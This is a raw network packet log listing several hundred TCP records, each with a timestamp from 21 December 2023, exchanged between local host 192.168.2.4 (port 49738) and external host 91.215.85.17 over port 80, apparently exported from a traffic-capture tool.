                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.966562986 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.966603041 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.966650963 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.966690063 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.966718912 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.966749907 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.966757059 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.966861010 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.966898918 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.966928005 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967005968 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967044115 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967137098 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967174053 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967179060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967250109 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967287064 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967334032 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967422962 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967463017 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967492104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967551947 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967603922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967710018 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967747927 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967787981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967926025 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.967972994 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.968097925 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.968225002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.968271971 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.968302011 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.968341112 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.968386889 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.968482018 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.968522072 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.968561888 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.968650103 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.968692064 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.968750954 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.968797922 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.968970060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969063997 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969104052 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969147921 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969280958 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969331980 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969362020 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969399929 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969429016 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969547033 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969589949 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969594002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969681025 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969726086 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969753981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969794035 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969837904 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969899893 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969928980 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.969969034 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970020056 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970060110 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970109940 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970149040 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970165968 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970206976 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970266104 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970309019 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970349073 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970390081 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970419884 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970459938 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970508099 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970551968 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970577955 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970629930 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970756054 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970768929 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970814943 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970868111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970952988 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.970993996 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971040964 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971075058 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971097946 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971206903 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971246004 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971276045 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971373081 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971414089 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971461058 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971504927 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971560955 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971652985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971692085 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971721888 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971746922 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971765041 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971775055 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971864939 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971910000 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.971954107 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.972033024 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.972069979 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.972116947 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.972152948 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.972178936 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.972235918 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.972275019 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.972302914 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.972345114 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.972392082 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.972440004 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:32.972480059 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.129997015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130119085 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130182981 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130234957 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130321026 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130377054 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130448103 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130465984 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130481005 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130615950 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130651951 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130657911 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130712986 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130759954 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130888939 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130928993 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.130983114 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131120920 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131134987 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131159067 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131186962 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131208897 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131313086 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131354094 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131366968 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131438017 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131477118 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131506920 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131541014 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131578922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131592989 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131629944 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131683111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131731033 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131776094 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131807089 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131843090 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131844044 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131866932 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131906033 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.131926060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132075071 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132116079 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132157087 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132194996 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132225037 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132278919 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132318974 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132349014 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132433891 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132467985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132474899 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132505894 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132519007 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132607937 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132648945 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132657051 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132749081 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132791042 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132822037 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132859945 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132865906 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132914066 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132955074 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.132991076 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.133085012 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.133104086 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.133128881 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.133141041 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.133162975 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.133563042 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.133601904 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.133651972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.133682013 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.133693933 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.133766890 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.133882999 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.133934975 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.133981943 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134044886 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134064913 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134088993 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134104013 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134107113 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134143114 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134149075 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134187937 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134238005 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134275913 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134330988 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134365082 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134422064 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134459019 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134485960 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134524107 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134565115 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134603977 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134632111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134673119 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134673119 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134706974 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134748936 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134788036 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134828091 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134865046 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134921074 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.134958029 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135014057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135047913 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135108948 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135145903 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135186911 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135222912 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135268927 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135328054 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135368109 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135406971 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135433912 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135477066 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135497093 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135534048 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135584116 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135622978 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135623932 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135662079 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135694981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135731936 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135798931 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135854959 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135893106 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.135936022 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.136028051 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.136066914 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.136116028 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.136149883 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.136163950 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.136204958 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.136243105 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.136282921 CET804973891.215.85.17192.168.2.4
